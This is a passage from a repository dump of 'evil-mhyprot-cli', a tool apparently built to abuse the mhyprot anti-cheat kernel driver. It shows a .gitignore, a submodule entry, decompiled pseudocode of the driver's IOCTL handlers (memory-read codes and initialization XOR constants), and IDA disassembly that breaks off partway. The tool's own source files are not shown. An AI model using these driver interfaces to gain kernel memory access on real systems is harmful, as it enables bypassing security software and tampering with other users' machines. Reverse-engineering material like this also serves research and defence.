Showing preview only (7,975K chars total). Download the full file or copy to clipboard to get everything.
Repository: leeza007/evil-mhyprot-cli
Branch: main
Commit: 1667eeae1f29
Files: 25
Total size: 7.6 MB
Directory structure:
gitextract_ep4t_2av/
├── .gitignore
├── .gitmodules
├── IDA/
│ ├── FUN_0001d000.cpp
│ ├── FUN_0001d6e0.cpp
│ ├── sub_FFFFF800188CD000.txt
│ └── sub_FFFFF800188CD6E0.txt
├── LICENSE
├── README.md
├── evil-mhyprot-cli.sln
├── seedmap.txt
└── src/
├── evil-mhyprot-cli.filters
├── evil-mhyprot-cli.vcxproj
├── file_utils.cpp
├── file_utils.hpp
├── logger.hpp
├── main.cpp
├── mhyprot.cpp
├── mhyprot.hpp
├── nt.hpp
├── raw_driver.hpp
├── service_utils.cpp
├── service_utils.hpp
├── sup.hpp
├── win_utils.cpp
└── win_utils.hpp
================================================
FILE CONTENTS
================================================
================================================
FILE: .gitignore
================================================
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
[Ll]ogs/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
# Ionide (cross platform F# VS Code tools) working folder
.ionide/
libmhyprot-src/*.cpp
libmhyprot-src/*.hpp
libmhyprot-src/*.h
libmhyprot-src/*.vcxproj
libmhyprot-src/*.vcxproj.filters
tests/*.cpp
tests/*.hpp
tests/*.h
tests/*.vcxproj
tests/*.vcxproj.filters
evil-mhyrot-cli.sln
================================================
FILE: .gitmodules
================================================
[submodule "libmhyprot"]
path = libmhyprot
url = https://github.com/kkent030315/libmhyprot.git
================================================
FILE: IDA/FUN_0001d000.cpp
================================================
//
// Pseudocode
//
ulonglong IOCTL_FUN_0001d000(
uint param_1,
ulonglong *param_2,
uint param_3,
ulonglong **param_4,
int *param_5
)
{
int iVar1;
bool bVar2;
int *piVar3;
uint uVar4;
uint uVar5;
ulonglong uVar6;
ulonglong *puVar7;
uint **ppuVar8;
ulonglong uVar9;
int **ppiVar10;
uint unaff_EDI;
undefined8 uVar11;
ulonglong **ppuVar12;
uint *puVar13;
undefined8 extraout_XMM0_Qb;
uint local_res20 [2];
undefined4 *local_2b8;
undefined4 in_stack_fffffffffffffd50;
undefined4 in_stack_fffffffffffffd54;
ulonglong *puVar14;
ulonglong *local_2a8;
undefined4 uStack672;
undefined4 uStack668;
uint *puStack664;
undefined4 uStack656;
undefined4 uStack652;
undefined4 uStack648;
undefined4 uStack644;
undefined4 uStack640;
undefined4 uStack636;
undefined8 uStack632;
undefined4 uStack616;
undefined4 uStack612;
undefined4 uStack608;
undefined4 uStack604;
undefined4 uStack600;
undefined4 uStack596;
undefined4 uStack592;
undefined4 uStack588;
undefined8 uStack584;
int *apiStack568 [66];
piVar3 = param_5;
uVar6 = (ulonglong)param_3;
*param_4 = (ulonglong *)0x0;
puVar13 = local_res20;
local_2a8 = (ulonglong *)0x0;
ppuVar12 = (ulonglong **)&stack0xfffffffffffffd58;
local_res20[0] = 0;
iVar1 = 0;
if (unaff_EDI != 0) {
while ((unaff_EDI >> iVar1 & 1) == 0) {
iVar1 = iVar1 + 1;
}
}
local_2b8 = &DAT_0001a0e8;
*param_5 = 0;
bVar2 = false;
uVar9 = FUN_00012134(param_2,param_3,ppuVar12,puVar13,&DAT_0001a0e8);
if ((((int)uVar9 == 0) || (local_2a8 == (ulonglong *)0x0)) || (local_res20[0] == 0)) {
bVar2 = true;
local_res20[0] = param_3;
local_2a8 = param_2;
}
if (bVar2) {
return uVar9 & 0xffffffffffffff00;
}
puVar14 = local_2a8;
if (param_1 < 0x81104001) {
if (param_1 == 0x81104000) {
param_5 = (int *)FUN_00016834(*(uint *)local_2a8);
LAB_0001d33a:
ppiVar10 = ¶m_5;
uVar5 = 8;
goto LAB_0001d5f0;
}
puVar7 = (ulonglong *)0x81054000;
if (0x81054000 < param_1) {
if (param_1 == 0x81064000) {
uVar6 = FUN_00013614(*(uint *)local_2a8,uVar6,ppuVar12,puVar13);
uVar5 = (uint)uVar6;
LAB_0001d2e9:
param_5 = (int *)CONCAT44(param_5._4_4_,uVar5);
}
else {
if (param_1 == 0x81074000) {
param_5 = (int *)((ulonglong)param_5._4_4_ << 0x20);
DispatchReadUserMemory_FUN_00014214((int *)local_2a8,(undefined4 *)¶m_5);
}
else {
if (param_1 != 0x81084000) {
if (param_1 != 0x81094000) goto LAB_0001d62b;
uVar6 = FUN_000135b0(*(uint *)local_2a8,uVar6,ppuVar12,puVar13);
uVar5 = (uint)uVar6;
goto LAB_0001d2e9;
}
param_5 = (int *)CONCAT44(param_5._4_4_,0x133ecf0);
}
}
LAB_0001d21c:
uVar5 = 4;
ppiVar10 = ¶m_5;
goto LAB_0001d5f0;
}
if (param_1 == 0x81054000) {
uVar5 = *(uint *)((longlong)local_2a8 + 4);
uVar4 = *(uint *)local_2a8;
puVar7 = (ulonglong *)ExAllocatePool(0,(ulonglong)uVar5 * 0x318 + 4);
uVar6 = FUN_0001274c(uVar4,(longlong)puVar7 + 4,uVar5);
uVar4 = (uint)uVar6;
*(uint *)puVar7 = uVar4;
if (uVar5 < uVar4) {
uVar4 = uVar5;
}
puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
uStack656 = DAT_0001a0f0;
uStack652 = DAT_0001a0f4;
uStack648 = DAT_0001a0f8;
uStack644 = DAT_0001a0fc;
uStack640 = DAT_0001a100;
uStack636 = DAT_0001a104;
uStack632 = DAT_0001a108;
FUN_00012270(puVar7,uVar4 * 0x318 + 4,param_4,piVar3,&puStack664);
puVar14 = local_2a8;
LAB_0001d2ac:
puVar7 = (ulonglong *)ExFreePoolWithTag(puVar7,0);
goto LAB_0001d62b;
}
if (param_1 == 0x80024000) {
FUN_000148fc(*(uint *)local_2a8);
param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000);
goto LAB_0001d21c;
}
if (param_1 == 0x81004000) {
uVar11 = 0x20;
FUN_00017900((undefined4 *)&uStack616,0,0x20);
puVar7 = (ulonglong *)FUN_00014310((longlong *)local_2a8,&uStack616,uVar11,puVar13);
puVar14 = local_2a8;
if ((int)puVar7 != 0) goto LAB_0001d62b;
goto LAB_0001d5e9;
}
if (param_1 == 0x81014000) {
FUN_0001696c(*(uint *)local_2a8);
uVar6 = FUN_00016994();
param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000 | (ulonglong)((char)uVar6 == '\x01')
);
LAB_0001d17f:
ppuVar8 = (uint **)&uStack616;
uVar5 = 4;
ppiVar10 = ¶m_5;
uStack616 = DAT_0001a0e8;
uStack612 = DAT_0001a0ec;
uStack608 = DAT_0001a0f0;
uStack604 = DAT_0001a0f4;
uStack584 = DAT_0001a108;
uStack600 = DAT_0001a0f8;
uStack596 = DAT_0001a0fc;
uStack592 = DAT_0001a100;
uStack588 = DAT_0001a104;
}
else {
if (param_1 == 0x81034000) {
thunk_FUN_000136b0(*(uint *)local_2a8);
param_5 = (int *)((ulonglong)param_5 & 0xffffffff00000000);
goto LAB_0001d17f;
}
if (param_1 != 0x81044000) goto LAB_0001d62b;
uVar5 = *(uint *)local_2a8;
FUN_00017900((undefined4 *)apiStack568,0,0x208);
FUN_00013bfc(uVar5,apiStack568,0x104,puVar13);
ppuVar8 = (uint **)&uStack616;
uVar5 = 0x208;
ppiVar10 = apiStack568;
uStack616 = DAT_0001a0e8;
uStack612 = DAT_0001a0ec;
uStack608 = DAT_0001a0f0;
uStack604 = DAT_0001a0f4;
uStack584 = DAT_0001a108;
uStack600 = DAT_0001a0f8;
uStack596 = DAT_0001a0fc;
uStack592 = DAT_0001a100;
uStack588 = DAT_0001a104;
}
}
else {
puVar7 = (ulonglong *)0x82044000;
if (param_1 < 0x82044001) {
if (param_1 == 0x82044000) {
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_00016268();
}
else {
if (param_1 == 0x81114000) {
param_5 = (int *)FUN_00013d44(*(uint *)local_2a8);
goto LAB_0001d33a;
}
if (param_1 == 0x81124000) {
FUN_000996ed(&LAB_0001db10,uVar6,(ulonglong)ppuVar12);
FUN_000b7de0();
uStack672 = (undefined4)extraout_XMM0_Qb;
uStack668 = (undefined4)((ulonglong)extraout_XMM0_Qb >> 0x20);
FUN_000cf4a3();
puStack664 = (uint *)FUN_000add98(DAT_0001a108);
FUN_000cf4a3();
uVar6 = FUN_0004609e();
return uVar6;
}
if (param_1 == 0x82004000) {
param_5 = (int *)((ulonglong)param_5._4_4_ << 0x20);
FUN_00016408(local_2a8[2],local_2a8[1],*local_2a8,puVar13,local_2b8,
(uint *)CONCAT44(in_stack_fffffffffffffd54,in_stack_fffffffffffffd50),
local_2a8);
goto LAB_0001d21c;
}
if (param_1 == 0x82014000) {
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_00015fa0();
}
else {
if (param_1 != 0x82024000) goto LAB_0001d62b;
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_00015f1c();
}
}
}
else {
if (param_1 == 0x82054000) {
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_000161bc(local_2a8,(int)register0x00000020 - 0x268);
}
else {
if (param_1 != 0x82064000) {
if (param_1 == 0x82114000) {
puVar7 = local_2a8;
if ((*(uint *)local_2a8 ^ 0xbaebaeec) != DAT_0001a688) goto LAB_0001d62b;
uVar5 = DAT_0001a6ec ^ DAT_0001a688;
goto LAB_0001d2e9;
}
if (((param_1 != 0x83014000) || (*(uint *)local_2a8 != 0x88)) ||
(puVar7 = (ulonglong *)
ExAllocatePool(0,(ulonglong)*(uint *)((longlong)local_2a8 + 4) * 0x2a8 + 4),
puVar7 == (ulonglong *)0x0)) goto LAB_0001d62b;
uVar6 = FUN_00016038((longlong)puVar7 + 4,(int *)local_2a8);
uVar5 = (uint)uVar6;
*(uint *)puVar7 = uVar5;
if (*(uint *)((longlong)local_2a8 + 4) < uVar5) {
uVar5 = *(uint *)((longlong)local_2a8 + 4);
}
puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
uStack656 = DAT_0001a0f0;
uStack652 = DAT_0001a0f4;
uStack648 = DAT_0001a0f8;
uStack644 = DAT_0001a0fc;
uStack640 = DAT_0001a100;
uStack636 = DAT_0001a104;
uStack632 = DAT_0001a108;
FUN_00012270(puVar7,uVar5 * 0x2a8 + 4,param_4,piVar3,&puStack664);
goto LAB_0001d2ac;
}
FUN_00017900((undefined4 *)&uStack616,0,0x20);
FUN_0001630c((longlong)local_2a8,(undefined4 *)&uStack616);
}
}
LAB_0001d5e9:
ppiVar10 = (int **)&uStack616;
uVar5 = 0x20;
LAB_0001d5f0:
ppuVar8 = &puStack664;
puStack664 = (uint *)CONCAT44(DAT_0001a0ec,DAT_0001a0e8);
uStack656 = DAT_0001a0f0;
uStack652 = DAT_0001a0f4;
uStack632 = DAT_0001a108;
uStack648 = DAT_0001a0f8;
uStack644 = DAT_0001a0fc;
uStack640 = DAT_0001a100;
uStack636 = DAT_0001a104;
}
puVar7 = (ulonglong *)FUN_00012270(ppiVar10,uVar5,param_4,piVar3,ppuVar8);
puVar14 = local_2a8;
LAB_0001d62b:
if (puVar14 != (ulonglong *)0x0) {
puVar7 = (ulonglong *)ExFreePoolWithTag(puVar14,0);
}
return CONCAT71((int7)((ulonglong)puVar7 >> 8),1);
}
================================================
FILE: IDA/FUN_0001d6e0.cpp
================================================
/* WARNING: Globals starting with '_' overlap smaller symbols at the same address */
//
// Pseudocode
//
undefined8 IOCTL_FUN_0001d6e0(undefined8 param_1,longlong param_2)
{
uint uVar1;
uint uVar2;
uint uVar3;
ulonglong *puVar4;
int iVar5;
undefined8 uVar6;
longlong lVar7;
ulonglong uVar8;
ulonglong *puVar9;
ulonglong uVar10;
uint local_res10 [2];
ulonglong *local_res18;
undefined8 local_198 [48];
lVar7 = *(longlong *)(param_2 + 0xb8);
puVar4 = *(ulonglong **)(param_2 + 0x18);
uVar1 = *(uint *)(lVar7 + 0x18);
uVar2 = *(uint *)(lVar7 + 0x10);
uVar3 = *(uint *)(lVar7 + 8);
uVar10 = (ulonglong)uVar3;
*(undefined8 *)(param_2 + 0x38) = 0;
if (uVar1 == 0x80104000) {
uVar6 = FUN_000121ec((longlong)puVar4,uVar2);
_DAT_0001a110 = (int)uVar6;
*(uint *)puVar4 = -(uint)(_DAT_0001a110 != 0) & 1;
LAB_0001d75c:
uVar10 = 4;
goto LAB_0001da4f;
}
if (((uVar1 + 0x7feec000 & 0xfffcffff) == 0) && (uVar1 != 0x80134000)) goto LAB_0001da4f;
if (uVar1 == 0x80134000) {
lVar7 = FUN_00012314();
*(int *)puVar4 = (int)lVar7;
goto LAB_0001d75c;
}
if (uVar1 == 0x82054000) {
uVar8 = FUN_000126d0(*(uint *)puVar4,(longlong)(uint *)((longlong)puVar4 + 4),
*(uint *)((longlong)puVar4 + 4));
iVar5 = (int)uVar8;
}
else {
if (uVar1 == 0x83024000) {
uVar8 = FUN_000162ec((longlong)puVar4 + 4,(int *)puVar4);
iVar5 = (int)uVar8;
}
else {
if (uVar1 == 0x83074000) {
uVar6 = FUN_00015f18();
iVar5 = (int)uVar6;
}
else {
/* MHYPROT_IOCTL_READ_KERNEL_MEMORY */
if (uVar1 != 0x83064000) {
if (uVar1 == 0x82074000) {
if (((uVar2 < 4) || (uVar3 < 0x38)) || (puVar4 == (ulonglong *)0x0)) goto LAB_0001da4f;
puVar9 = (ulonglong *)ExAllocatePoolWithTag(1,uVar10,0x4746544d);
*puVar9 = SUB168(ZEXT816(0xaaaaaaaaaaaaaaab) * ZEXT816(uVar10 - 8) >> 0x45,0) &
0xffffffff;
uVar8 = FUN_000132b0((uint *)puVar4,puVar9);
*(int *)(param_2 + 0x30) = (int)uVar8;
if ((int)uVar8 < 0) {
uVar10 = 8;
*puVar4 = *puVar9;
}
else {
uVar8 = *puVar9 * 0x30 + 8;
LAB_0001d842:
*(ulonglong *)(param_2 + 0x38) = uVar8;
FUN_000175c0(puVar4,puVar9,uVar8);
}
LAB_0001d85b:
uVar6 = 0x4746544d;
}
else {
if (uVar1 == 0x82104000) {
if (((uVar2 < 0x28) || (uVar3 < 0x20)) || (puVar4 == (ulonglong *)0x0))
goto LAB_0001da4f;
puVar9 = (ulonglong *)ExAllocatePoolWithTag(1,uVar10,0x4746544d);
*(int *)puVar9 =
(int)SUB168(ZEXT816(0xaaaaaaaaaaaaaaab) * ZEXT816(uVar10 - 4) >> 0x44,0);
uVar6 = FUN_0001377c((longlong)puVar4,(uint *)puVar9);
*(int *)(param_2 + 0x30) = (int)uVar6;
if (-1 < (int)uVar6) {
uVar8 = (ulonglong)*(uint *)puVar9 * 0x18 + 4;
goto LAB_0001d842;
}
uVar10 = 4;
*(uint *)puVar4 = *(uint *)puVar9;
goto LAB_0001d85b;
}
if (uVar1 == 0x82094000) {
*(undefined4 *)puVar4 = 0;
goto LAB_0001da4f;
}
/* MHYPROT_IOCTL_INITIALIZE */
if (uVar1 == 0x80034000) {
if (uVar2 == 0x10) {
puVar4[1] = puVar4[1] ^ 0xebbaaef4fff89042;
*puVar4 = *puVar4 ^ puVar4[1];
if (*(int *)((longlong)puVar4 + 4) == -0x45145114) {
FUN_000151a8(*(undefined4 *)puVar4);
if ((int)DAT_0001a108 == 0) {
FUN_0001301c((longlong *)&DAT_0001a0e8,puVar4[1]);
lVar7 = 7;
do {
uVar10 = FUN_00012eb0((uint **)&DAT_0001a0e8);
*puVar4 = uVar10;
DAT_0001a108._0_4_ = 1;
lVar7 = lVar7 + -1;
} while (lVar7 != 0);
uVar10 = 8;
}
else {
uVar10 = 0;
}
}
}
goto LAB_0001da4f;
}
if (uVar1 == 0x81134000) goto LAB_0001da4f;
if (uVar1 == 0x81144000) {
uVar10 = FUN_00016654(*(uint *)puVar4,(longlong)local_198);
iVar5 = (int)uVar10;
if (-1 < iVar5) {
uVar10 = (ulonglong)(uint)(iVar5 * 0x18);
if (0 < iVar5) {
FUN_000175c0(puVar4,local_198,(longlong)iVar5 * 0x18);
}
goto LAB_0001da4f;
}
uVar10 = 4;
goto LAB_0001d7c1;
}
local_res18 = (ulonglong *)0x0;
local_res10[0] = 0;
uVar8 = IOCTL_FUN_0001d000(uVar1,puVar4,uVar2,&local_res18,(int *)local_res10);
puVar9 = local_res18;
if ((char)uVar8 == '\0') goto LAB_0001da4f;
if (uVar3 < local_res10[0]) {
local_res10[0] = uVar3;
}
if ((local_res18 == (ulonglong *)0x0) || (local_res10[0] == 0)) goto LAB_0001da4f;
uVar10 = (ulonglong)local_res10[0];
FUN_000175c0(puVar4,local_res18,(ulonglong)local_res10[0]);
uVar6 = 0;
}
ExFreePoolWithTag(puVar9,uVar6);
goto LAB_0001da4f;
}
uVar6 = FUN_000163a8((undefined4 *)((longlong)puVar4 + 4),*puVar4,*(uint *)(puVar4 + 1));
iVar5 = (int)uVar6;
}
}
}
LAB_0001d7c1:
*(int *)puVar4 = iVar5;
LAB_0001da4f:
*(ulonglong *)(param_2 + 0x38) = uVar10;
*(undefined4 *)(param_2 + 0x30) = 0;
IofCompleteRequest(param_2,0);
return 0;
}
================================================
FILE: IDA/sub_FFFFF800188CD000.txt
================================================
PAGE:FFFFF800188CD000 ; =============== S U B R O U T I N E =======================================
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 ; Attributes: bp-based frame fpd=1D0h
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 sub_FFFFF800188CD000 proc near ; CODE XREF: sub_FFFFF800188CD6E0+327↓p
PAGE:FFFFF800188CD000 ; DATA XREF: .upx0:FFFFF800189F301C↓o
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 var_250 = xmmword ptr -250h
PAGE:FFFFF800188CD000 var_240 = qword ptr -240h
PAGE:FFFFF800188CD000 var_230 = byte ptr -230h
PAGE:FFFFF800188CD000 var_s0 = qword ptr 0
PAGE:FFFFF800188CD000 arg_8 = qword ptr 18h
PAGE:FFFFF800188CD000 arg_10 = xmmword ptr 20h
PAGE:FFFFF800188CD000 arg_20 = qword ptr 30h
PAGE:FFFFF800188CD000 arg_30 = qword ptr 40h
PAGE:FFFFF800188CD000 arg_40 = xmmword ptr 50h
PAGE:FFFFF800188CD000 arg_280 = byte ptr 290h
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 ; FUNCTION CHUNK AT .upx0:FFFFF800189F2672 SIZE 0000005C BYTES
PAGE:FFFFF800188CD000
PAGE:FFFFF800188CD000 mov [rsp+8], rbx
PAGE:FFFFF800188CD005 mov [rsp-8+arg_8], rsi
PAGE:FFFFF800188CD00A push rbp
PAGE:FFFFF800188CD00B push rdi
PAGE:FFFFF800188CD00C push r12
PAGE:FFFFF800188CD00E push r14
PAGE:FFFFF800188CD010 push r15
PAGE:FFFFF800188CD012 lea rbp, [rsp-1B0h]
PAGE:FFFFF800188CD01A sub rsp, 2B0h
PAGE:FFFFF800188CD021 mov ebx, ecx
PAGE:FFFFF800188CD023 mov r14, r9
PAGE:FFFFF800188CD026 lea rcx, qword_FFFFF800188CDB00
PAGE:FFFFF800188CD02D mov esi, r8d
PAGE:FFFFF800188CD030 mov r12, rdx
PAGE:FFFFF800188CD033 jmp loc_FFFFF800189F25E7
PAGE:FFFFF800188CD033 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD038 db 6Bh dup(0CCh)
PAGE:FFFFF800188CD0A3 ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD0A3
PAGE:FFFFF800188CD0A3 loc_FFFFF800188CD0A3: ; CODE XREF: sub_FFFFF800189F2541+6D↓j
PAGE:FFFFF800188CD0A3 test dil, dil
PAGE:FFFFF800188CD0A6 jz short loc_FFFFF800188CD0AF
PAGE:FFFFF800188CD0A8 xor al, al
PAGE:FFFFF800188CD0AA jmp loc_FFFFF800188CD642
PAGE:FFFFF800188CD0AF ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD0AF
PAGE:FFFFF800188CD0AF loc_FFFFF800188CD0AF: ; CODE XREF: sub_FFFFF800188CD000+A6↑j
PAGE:FFFFF800188CD0AF mov eax, 81104000h
PAGE:FFFFF800188CD0B4 cmp ebx, eax
PAGE:FFFFF800188CD0B6 ja loc_FFFFF800188CD352
PAGE:FFFFF800188CD0BC jz loc_FFFFF800188CD32E
PAGE:FFFFF800188CD0C2 mov eax, 81054000h
PAGE:FFFFF800188CD0C7 cmp ebx, eax
PAGE:FFFFF800188CD0C9 ja loc_FFFFF800188CD2B9
PAGE:FFFFF800188CD0CF jz loc_FFFFF800188CD22D
PAGE:FFFFF800188CD0D5 cmp ebx, 80024000h
PAGE:FFFFF800188CD0DB jz loc_FFFFF800188CD209
PAGE:FFFFF800188CD0E1 cmp ebx, 81004000h
PAGE:FFFFF800188CD0E7 jz loc_FFFFF800188CD1D9
PAGE:FFFFF800188CD0ED cmp ebx, 81014000h
PAGE:FFFFF800188CD0F3 jz loc_FFFFF800188CD1B9
PAGE:FFFFF800188CD0F9 cmp ebx, 81034000h
PAGE:FFFFF800188CD0FF jz short loc_FFFFF800188CD16C
PAGE:FFFFF800188CD101 cmp ebx, 81044000h
PAGE:FFFFF800188CD107 jnz loc_FFFFF800188CD62B
PAGE:FFFFF800188CD10D mov rax, [rsp+30h]
PAGE:FFFFF800188CD112 lea rcx, [rbp+1D0h+var_230]
PAGE:FFFFF800188CD116 mov edi, 208h
PAGE:FFFFF800188CD11B xor edx, edx
PAGE:FFFFF800188CD11D mov r8d, edi
PAGE:FFFFF800188CD120 mov ebx, [rax]
PAGE:FFFFF800188CD122 call sub_FFFFF800188C7900
PAGE:FFFFF800188CD127 mov r8d, 104h
PAGE:FFFFF800188CD12D lea rdx, [rbp+1D0h+var_230]
PAGE:FFFFF800188CD131 mov ecx, ebx
PAGE:FFFFF800188CD133 call sub_FFFFF800188C3BFC
PAGE:FFFFF800188CD138 movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD13F lea rax, [rsp+20h+arg_40]
PAGE:FFFFF800188CD144 mov edx, edi
PAGE:FFFFF800188CD146 movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD14D lea rcx, [rbp+1D0h+var_230]
PAGE:FFFFF800188CD151 movaps [rsp+20h+arg_40], xmm0
PAGE:FFFFF800188CD156 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD15E movsd [rbp+1D0h+var_240], xmm0
PAGE:FFFFF800188CD163 movaps [rbp+1D0h+var_250], xmm1
PAGE:FFFFF800188CD167 jmp loc_FFFFF800188CD61B
PAGE:FFFFF800188CD16C ; ---------------------------------------------------------------------------
PAGE:FFFFF800188CD16C
PAGE:FFFFF800188CD16C loc_FFFFF800188CD16C: ; CODE XREF: sub_FFFFF800188CD000+FF↑j
PAGE:FFFFF800188CD16C mov rax, [rsp+30h]
PAGE:FFFFF800188CD171 mov ecx, [rax]
PAGE:FFFFF800188CD173 call sub_FFFFF800188C36A8
PAGE:FFFFF800188CD178 and dword ptr [rbp+1D0h+arg_20], 0
PAGE:FFFFF800188CD17F
PAGE:FFFFF800188CD17F loc_FFFFF800188CD17F: ; CODE XREF: sub_FFFFF800188CD000+1D7↓j
PAGE:FFFFF800188CD17F movups xmm0, cs:xmmword_FFFFF800188CA0E8
PAGE:FFFFF800188CD186 lea rax, [rsp+20h+arg_40]
PAGE:FFFFF800188CD18B mov edx, 4
PAGE:FFFFF800188CD190 movups xmm1, cs:xmmword_FFFFF800188CA0F8
PAGE:FFFFF800188CD197 lea rcx, [rbp+1D0h+arg_20]
PAGE:FFFFF800188CD19E movaps [rsp+20h+arg_40], xmm0
PAGE:FFFFF800188CD1A3 movsd xmm0, cs:qword_FFFFF800188CA108
PAGE:FFFFF800188CD1AB movsd [rbp+1D0h+var_240], xmm0
PAGE:FFFFF800188CD1B0 movaps [rbp+1D0h+var_250], xmm1
PAGE:FFFFF800188CD1B4 jmp loc_FFFFF800188CD61B
